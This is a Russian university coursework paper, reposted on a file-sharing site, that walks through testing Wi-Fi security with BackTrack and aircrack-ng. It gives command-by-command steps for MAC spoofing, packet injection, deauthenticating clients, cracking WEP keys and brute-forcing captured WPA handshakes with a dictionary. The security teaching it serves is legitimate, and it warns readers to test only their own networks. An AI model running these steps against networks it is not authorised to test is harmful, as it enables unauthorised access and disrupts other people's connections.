Курсовая работа По предмету: «Инженерно-техническая защита информации»




Скачать 73.91 Kb.
НазваниеКурсовая работа По предмету: «Инженерно-техническая защита информации»
Дата публикации11.06.2016
Размер73.91 Kb.
ТипКурсовая
edushk.ru > Информатика > Курсовая
СПбГУАП

Кафедра № 52

Рейтинг за работу

Преподаватель Белоголовый В.Г.

Курсовая работа

По предмету: «Инженерно-техническая защита информации»

Дистрибутив «Backtrack».

Проверка стойкости беспроводных сетей.

Работу выполнил

студент группы 5821 Толстяков А.Н.

Санкт-Петербург

2011

Внимание! Перед взломом wifi сети, пожалуйста, узнайте, законно ли это, автор эксперементировал только с собственной сетью. Взлом чужой сети может повлечь уголовную ответственность…

И так, поехали:

Для взлома wi-fi сети необходимо минимум три составляющие:
1. Беспроводная карта, совместимая с программой для взлома! (Если для вашей карты нет специального драйвера, то все попытки использовать программы для взлома wi-fi сети будут заканчиваться неудачей).
2. Специальный драйвер.
3. Набор программ для взлома WLAN сети.

Начнем с третьей составляющей, из всех программ для взлома wi-fi сетей я рекомендую использовать набор Aircrack-ng (сайт разработчиков). Программные инструменты мы выбрали, дальше действуем по обстоятельствам.

^ Обстоятельство номер один, у вас нет wi-fi карты и вы планируете купить её. Самый простой способ приобрести совместимую с aircrack-ng карту, это выбрать из списка поддерживаемых карт или посмотреть в форуме. Можно также воспользоваться информацией ниже и подобрать что-то из имеющегося в магазине.

На первом этапе выбора беспроводной карты вы должны решить:
— Какую операционную систему вы планируете использовать?
— Какой аппаратный формат вам подходит (PCI, PCMCIA, USB и т. д.)?
— Какие функции вам необходимы?

Есть два производителя, участвующих в производстве беспроводных карт. Первый это производитель самой карты, второй это производитель беспроводного чипсета. Второй производитель для нас наиболее важен. К сожалению, иногда бывает труднее всего определить на каком чипсете собрана карта. Информация о производителе беспроводного чипсета карты, позволяет вам определить, какие операционные системы поддерживают данную карту, какие драйверы нужны и все ограничения связанные с ними.

Наиболее удачным выбором, по мнению создателей программы aircrack, является покупка карты на основе набора микросхем Atheros или Realtek RTL8187L.

^ Обстоятельства номер два, у вас уже есть беспроводная карта и вы хотите понять, можно ли использовать ее для взлома wi-fi сети. Вам в первую очередь необходимо узнать чипсет и выяснить совместима ваша карта или нет.

Если вы выяснили, что ваша wi-fi карта совместима или купили нужную, то можно продолжить в подготовке к взлому. В какой ОС Windows или Linux вы можете работать? Самый лучший вариант, опять же по мнению разработчиков aircrack, это linux, но можно использовать и windows.

Мы же рассмотрим еще более удобный вариант. Это специализированный дистрибутив для анализа безопасности Backtrack. На официальном сайте проекта можно познакомиться с дистрибутивом и скачать последнюю версию.

BackTrack — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность. В настоящий момент последняя стабильная версия — Backtrack 5 (от мая 2011 года).

Дистрибутив создан для тестировщиков информационной безопасности. Поставляется в виде LiveUSB и liveCD , от пользователя требуется только загрузиться с носителя содержащего BackTrack. Также есть возможность установки системы на жёсткий диск (требуется примерно 2,7 ГБ).

Наиболее известные программы в пакете

В данной работе я рассмотрю первый из них – aircrack-ng, который предназначен для взлома беспроводных сетей. По пунктам пройдём возможный алгорим взлома Wi-Fi с WEP шифрованием.
^

Подготавливаем WIFI карту


Для начала мы должны перевести карту в режим “Monitor Mode”. Если вы используете чипчет Atheros выполните следующую команду:

modprobe -r ath9k modprobe ipwraw

Далее мы должны остановить нашу WIFI карту:

iwconfig

Посмотри под каким именем виден ваш беспроводной интерфейс, далее остановите его командой:

airmon-ng stop [device]

Затем:

ifconfig down [interface]

Изменяем MAC адрес устройства:

macchanger --mac 00:11:22:33:44:66 [device]

Запускаем карту:

airmon-ng start [device]
^

Начинаем атаку


Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:

airodump-ng [device]

Мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь мы начнем собирать данные с WIFI роутера для атаки:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

Команда выше поместит полученные данные в файл network.out. Этот файл потребутеся нам позднее когда мы будем готовы взламывать WEP ключ.

Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле “data”, в котором уже довольно много пакетов.

Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

 

 

Когда мы наберем достаточно пакетов, начинаем взлом:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

Параметр “-n 128″ указывает на 128-битный WEP ключ. Если взлом не получится, используйте  “-n 64″

Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :

Используйте данную технику для демонстрации слабости WEP шифрования. Я надеюсь вы сами используете WPA2 в ваших сетях.

Взлом WPA шифрования во многом идентичен взлому WEP, с одной лишь разницей что пароль сама программа расшифровать не сможет. Поэтому в случае WPA/WPA2 нам придется находить ключ полным перебором паролей из заранее заготовленного словаря.

^ Выбор точки

Теперь мы будем искать точку с шифрованием WPA
airodump-ng --encrypt wpa [имя вашего адаптера]


Выбираем точку, предварительно переписав\скопипастив куда-нибудь её сетевое имя (ESSID), сетевой адрес (BSSID), и канал (CH).

^ Атака цел

Когда мы определились с целью, можно начинать атаку. Пишем
airodump-ng -w out -c [канал точки] --bssid [сетевой адрес точки] [имя вашего адаптера]


для сбора данных с точки и последующей атаки.
(-w это параметр записи пакетов в файл, т.е. имя файла вы можете выставить произвольное, если использовать указанное в данном примере, то файл на выходе будет называться out-01.cap).

Для подбора ключа нам нужен handshake (рукопожатие). Для того чтобы его “поймать”, нам либо остается ждать пока кто-нибудь не подключиться к точке и не скормит его нашему airodump'у. Но если на точке есть активный клиент, можем послать пакет для деавторизации клиента, что заставит его переподключиться.
Запишем куда-нибудь мак адрес клиента и откроем новую консоль, не закрывая эту.
Пишем
aireplay-ng -0 5 -a [сетевой адрес точки] -c [мак адрес клиента (Client Mac)] [имя вашего адаптера]

-0 5 означает что мы отправляем 5 деауентификационных пакетов.

Если клиентов нет, то будем использовать другой метод:
aireplay-ng -0 5 -a [сетевой адрес точки] [имя вашего адаптера]
Он не гарантирован, и не всегда срабатывает.
Это практически тот же метод, что указан выше, только на случай, если клиентов на точке нету...

Переходим в первую консоль, если airodump оповестит нас в правом верхнем углу, что у нас есть handshake, то можно приступать к следующему шагу...
Если вы не успели\не смогли\забыли увидеть оповещение, то пишем
aircrack-ng out-01.cap


если же handshake у нас, то вы увидите handshake 1
Подбор ключа

После того, как handshake оказался у нас, можем начинать подбор.
Тут у нас никаких сложностей, все зависит только от словаря.
Пишем

aircrack-ng -c out-01.cap -w [путь к словарю]

если ключ был в словаре есть вы его подберете 100%

В современном мире зачастую мощность персональных компьютеров позволяет перебирать пароли с очень большой скоростью. Использование технологий CUDA и OpenCL позволяет добиться увеличения производительности в 27-30 раз!!! По сравнению с одноядерным процессором.

В дистрибутивы Backtrack 4 b выше включена программа использующая параллельные вычисления. Называется она Pyrit. Официальный сайт программы рассказывает о новых веяниях в области параллельных вычислений и помогает разобраться с установкой программы.

Это только начавшая развиваться область, но очень перспективная. Об этом следует рассказать отдельно, и я надеюсь сделать это в будущем.

****************************

ССЫЛКИ!!! -откуда были взяты дистрибутивы

- в азарте забыто главное: хотя это оружие обоюдоострое (двойного применения), сборка ВТ предназначена для ПРОВЕРКИ УСТОЙЧИВОСТИ КО ВЗЛОМУ, а не для взлома ради взлома.

Добавить документ в свой блог или на сайт

Похожие:

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconОтчет защищен с оценкой преподаватель белоголовый В. Г. доц., к т....
Быстрое распространение вредоносных программ благодаря различным типам компьютерных сетей (локальных и глобальных) все чаще приводит...

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа должна включать в себя следующие разделы
Курсовая работа – это более глубокое и объемное исследование избранной проблемы учебного курса, чем реферат, доклад и контрольная...

Курсовая работа По предмету: «Инженерно-техническая защита информации» icon«защита информации от несанкционированного доступа»
Фз о защите информации, который рассматривает проблемы защиты информации и задачи защиты информации, а также решает некоторые уникальные...

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconИнженерно-техническая оснащенность объекта (техническая оснащенность объекта)

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconВопросы к экзамену по предмету «Программно-аппаратная защита информации»
Понятие несанкционированного доступа (нсд), классы и виды нсд. Несанкционированное копирование программ как особый вид нсд

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа по дисциплине «Теория и практика массовой информации»
Кафедра «Экономика и управления на предприятии нефтяной и газовой промышленности» 1

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа
Курсовая работа должна носить творческий исследовательский характер и быть направленной на приобретение и развитие, во-первых, практических...

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа. По предмету: «Экономическая теория». На тему: «Особенности...
Банковский кредит. Субъекты кредитной сделки. Принципы банковского кредитования

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа. «Определение стоимости проектных работ». По предмету: «Экономика отрасли»
Экономический рост, к рубежу которого в настоящее время подошла Россия, безусловно, вызовет активизацию инвестиционной деятельности...

Курсовая работа По предмету: «Инженерно-техническая защита информации» iconКурсовая работа по предмету «Учет в банках и операционная деятельность»
В период господства командно-административного регулирования экономики кассовые операции коммерческих банков не существовали как...

Вы можете разместить ссылку на наш сайт:
Школьные материалы


При копировании материала укажите ссылку © 2013
контакты
edushk.ru
Главная страница

Разработка сайта — Веб студия Адаманов